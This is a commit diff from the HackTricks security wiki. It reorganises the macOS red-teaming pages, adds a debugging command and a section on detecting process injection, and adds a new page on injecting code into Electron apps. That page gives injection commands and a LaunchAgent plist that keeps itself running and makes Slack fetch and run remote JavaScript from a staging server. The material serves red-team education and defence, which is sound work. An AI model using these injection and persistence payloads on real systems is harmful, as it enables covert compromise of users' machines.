mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
GITBOOK-3977: change request with no subject merged in GitBook
This commit is contained in:
parent
840b63af94
commit
9fda734b95
11 changed files with 144 additions and 10 deletions
BIN
.gitbook/assets/Pasted Graphic 14.png
Normal file
BIN
.gitbook/assets/Pasted Graphic 14.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 1.2 MiB |
|
@ -144,9 +144,6 @@
|
|||
* [macOS AppleFS](macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md)
|
||||
* [macOS Kernel](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md)
|
||||
* [macOS Kernel Extensions](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md)
|
||||
* [macOS MDM](macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md)
|
||||
* [Enrolling Devices in Other Organisations](macos-hardening/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md)
|
||||
* [macOS Serial Number](macos-hardening/macos-security-and-privilege-escalation/macos-mdm/macos-serial-number.md)
|
||||
* [macOS Network Services & Protocols](macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md)
|
||||
* [macOS Bypassing Firewalls](macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md)
|
||||
* [macOS File Extension & URL scheme app handlers](macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md)
|
||||
|
@ -162,6 +159,7 @@
|
|||
* [macOS XPC Connecting Process Check](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md)
|
||||
* [macOS PID Reuse](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md)
|
||||
* [macOS XPC Authorization](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md)
|
||||
* [macOS Electron Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md)
|
||||
* [macOS Function Hooking](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md)
|
||||
* [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
|
||||
* [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
||||
|
@ -173,7 +171,10 @@
|
|||
* [macOS TCC](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md)
|
||||
* [macOS Apple Scripts](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-scripts.md)
|
||||
* [macOS Users](macos-hardening/macos-security-and-privilege-escalation/macos-users.md)
|
||||
* [macOS Red Teaming](macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming.md)
|
||||
* [macOS Red Teaming](macos-hardening/macos-red-teaming/README.md)
|
||||
* [macOS MDM](macos-hardening/macos-red-teaming/macos-mdm/README.md)
|
||||
* [Enrolling Devices in Other Organisations](macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md)
|
||||
* [macOS Serial Number](macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md)
|
||||
* [macOS Useful Commands](macos-hardening/macos-useful-commands.md)
|
||||
* [macOS Auto Start Locations](macos-hardening/macos-auto-start-locations.md)
|
||||
|
||||
|
|
|
@ -27,8 +27,8 @@ For red teaming in MacOS environments it's highly recommended to have some under
|
|||
|
||||
And also about **MacOS** "special" **network** **protocols**:
|
||||
|
||||
{% content-ref url="macos-protocols.md" %}
|
||||
[macos-protocols.md](macos-protocols.md)
|
||||
{% content-ref url="../macos-security-and-privilege-escalation/macos-protocols.md" %}
|
||||
[macos-protocols.md](../macos-security-and-privilege-escalation/macos-protocols.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Active Directory
|
|
@ -60,8 +60,8 @@ If you are not familiar with macOS, you should start learning the basics of macO
|
|||
|
||||
In companies **macOS** systems are highly probably going to be **managed with a MDM**. Therefore, from the perspective of an attacker is interesting to know **how that works**:
|
||||
|
||||
{% content-ref url="macos-mdm/" %}
|
||||
[macos-mdm](macos-mdm/)
|
||||
{% content-ref url="../macos-red-teaming/macos-mdm/" %}
|
||||
[macos-mdm](../macos-red-teaming/macos-mdm/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### MacOS - Inspecting, Debugging and Fuzzing
|
||||
|
|
|
@ -379,6 +379,16 @@ cat procs.txt
|
|||
|
||||
Or use `netstat` or `lsof`
|
||||
|
||||
### Libgmalloc
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/Pasted Graphic 14.png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
lldb -o "target create `which some-binary`" -o "settings set target.env-vars DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib" -o "run arg1 arg2" -o "bt" -o "reg read" -o "dis -s \$pc-32 -c 24 -m -F intel" -o "quit"
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### Fuzzers
|
||||
|
||||
#### [AFL++](https://github.com/AFLplusplus/AFLplusplus)
|
||||
|
|
|
@ -40,6 +40,30 @@ Inter Process Communication (IPC) refers to different methods by which separate
|
|||
[macos-ipc-inter-process-communication](../mac-os-architecture/macos-ipc-inter-process-communication/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Electron Applications Injection
|
||||
|
||||
Electron applications executed with specific env variables could be vulnerable to process injection:
|
||||
|
||||
{% content-ref url="macos-electron-applications-injection.md" %}
|
||||
[macos-electron-applications-injection.md](macos-electron-applications-injection.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Detection
|
||||
|
||||
### Shield
|
||||
|
||||
[**Shield**](https://theevilbit.github.io/shield/) ([**Github**](https://github.com/theevilbit/Shield)) is an open source application that can **detect and block process injection** actions:
|
||||
|
||||
* Using **Environmental Variables**: It will monitor the presence of any of the following environmental variables: **`DYLD_INSERT_LIBRARIES`**, **`CFNETWORK_LIBRARY_PATH`**, **`RAWCAMERA_BUNDLE_PATH`** and **`ELECTRON_RUN_AS_NODE`**
|
||||
* Using **`task_for_pid`** calls: To find when one process wants to get the **task port of another** which allows to inject code in the process.
|
||||
* **Electron apps params**: Someone can use **`--inspect`**, **`--inspect-brk`** and **`--remote-debugging-port`** command line argument to start an Electron app in debugging mode, and thus inject code to it.
|
||||
* Using **symlinks** or **hardlinks**: Typically the most common abuse is to **place a link with our user privileges**, and **point it to a higher privilege** location. The detection is very simple for both hardlink and symlinks. If the process creating the link has a **different privilege level** than the target file, we create an **alert**. Unfortunately in the case of symlinks blocking is not possible, as we don’t have information about the destination of the link prior creation. This is a limitation of Apple’s EndpointSecuriy framework.
|
||||
|
||||
## References
|
||||
|
||||
* [https://theevilbit.github.io/shield/](https://theevilbit.github.io/shield/)
|
||||
* [https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
|
|
@ -0,0 +1,97 @@
|
|||
# macOS Electron Applications Injection
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
## Inspect Electron Application
|
||||
|
||||
According to [**this**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f), if you execute an Electron application with flags such as **`--inspect`**, **`--inspect-brk`** and **`--remote-debugging-port`**, a **debug port will be open** so you can connect to it (for example from Chrome in `chrome://inspect`) and you will be able to **inject code on it** or even launch new processes.\
|
||||
For example:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
/Applications/Signal.app/Contents/MacOS/Signal --inspect=9229
|
||||
# Connect to it using chrome://inspect and execute a calculator with:
|
||||
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
Note that now most Electron applications will ignore node parameters (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set.
|
||||
|
||||
However, you could still use the electron param `--remote-debugging-port=9229` but the previous payload won't work to execute other processes.
|
||||
{% endhint %}
|
||||
|
||||
## `ELECTRON_RUN_AS_NODE` <a href="#electron_run_as_node" id="electron_run_as_node"></a>
|
||||
|
||||
According to [**the docs**](https://www.electronjs.org/docs/latest/api/environment-variables#electron\_run\_as\_node), if this env variable is set, it will start the process as a normal Node.js process.
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
# Run this
|
||||
ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
|
||||
# Then from the nodeJS console execute:
|
||||
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
As [**proposed here**](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/), you could abuse this env variable in a plist to maintain persistence:
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||||
<plist version="1.0">
|
||||
<dict>
|
||||
<key>EnvironmentVariables</key>
|
||||
<dict>
|
||||
<key>ELECTRON_RUN_AS_NODE</key>
|
||||
<string>true</string>
|
||||
</dict>
|
||||
<key>Label</key>
|
||||
<string>com.xpnsec.hideme</string>
|
||||
<key>ProgramArguments</key>
|
||||
<array>
|
||||
<string>/Applications/Slack.app/Contents/MacOS/Slack</string>
|
||||
<string>-e</string>
|
||||
<string>const { spawn } = require("child_process"); spawn("osascript", ["-l","JavaScript","-e","eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString('http://stagingserver/apfell.js')), $.NSUTF8StringEncoding)));"]);</string>
|
||||
</array>
|
||||
<key>RunAtLoad</key>
|
||||
<true/>
|
||||
</dict>
|
||||
</plist>
|
||||
```
|
||||
|
||||
### `ELECTRON_RUN_AS_NODE` & `NODE_OPTIONS`  
|
||||
|
||||
With this combination you could store the payload in a different file and execute that file:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
# Content of /tmp/payload.js
|
||||
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Ca$
|
||||
|
||||
# Execute
|
||||
NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
|
@ -163,7 +163,7 @@ system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistC
|
|||
|
||||
The Malware Removal Tool (MRT) is another part of macOS's security infrastructure. As the name suggests, MRT's main function is to **remove known malware from infected systems**.
|
||||
|
||||
Once malware is detected on a Mac (either by XProtect or by some other means), MRT can be used to automatically **remove the malware**. MRT operates silently in the background and typically runs whenever the system is updated or when a new malware definition is downloaded.
|
||||
Once malware is detected on a Mac (either by XProtect or by some other means), MRT can be used to automatically **remove the malware**. MRT operates silently in the background and typically runs whenever the system is updated or when a new malware definition is downloaded (it looks like the rules MRT has to detect malware are inside the binary).
|
||||
|
||||
While both XProtect and MRT are part of macOS's security measures, they perform different functions:
|
||||
|
||||
|
@ -174,7 +174,9 @@ While both XProtect and MRT are part of macOS's security measures, they perform
|
|||
|
||||
### SIP - System Integrity Protection
|
||||
|
||||
|
||||
{% content-ref url="macos-sip.md" %}
|
||||
[macos-sip.md](macos-sip.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Sandbox
|
||||
|
||||
|
|
Loading…
Reference in a new issue